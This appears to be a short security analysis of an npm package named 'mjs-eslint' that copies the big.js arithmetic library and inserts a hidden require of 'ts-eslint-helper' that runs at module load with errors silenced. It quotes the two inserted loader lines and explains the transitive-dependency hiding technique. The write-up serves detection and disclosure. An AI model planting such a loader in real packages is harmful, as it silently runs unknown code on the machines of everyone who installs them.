The package is published as 'mjs-eslint' but its description, file layout (big.js, big.mjs), and source are a verbatim copy of the legitimate big.js arbitrary-precision arithmetic library by Michael Mclaughlin. Two lines have been inserted into the IIFE at big.js:605-606 (and identically in big.mjs:605-606): const helper = require("ts-eslint-helper"); helper.from_str().then(e => e).catch(e => { });. The corresponding dependency "ts-eslint-helper": "^4.0.1" is declared in package.json. This call fires at module load on any require('mjs-eslint') or import of the package, executes asynchronously, and silently swallows all errors via .catch(()=>{}). An arithmetic library has no legitimate reason to load a 'ts-eslint' helper at module init, and the name mismatch between the host package (mjs-eslint), the cloned library (big.js), and the dependency (ts-eslint-helper) is the canonical pattern of hiding the payload one hop away in a transitive dependency to evade scanners. Installer harm: any consumer who requires this package pulls in and executes whatever ts-eslint-helper's from_str() contains, with no visible signal.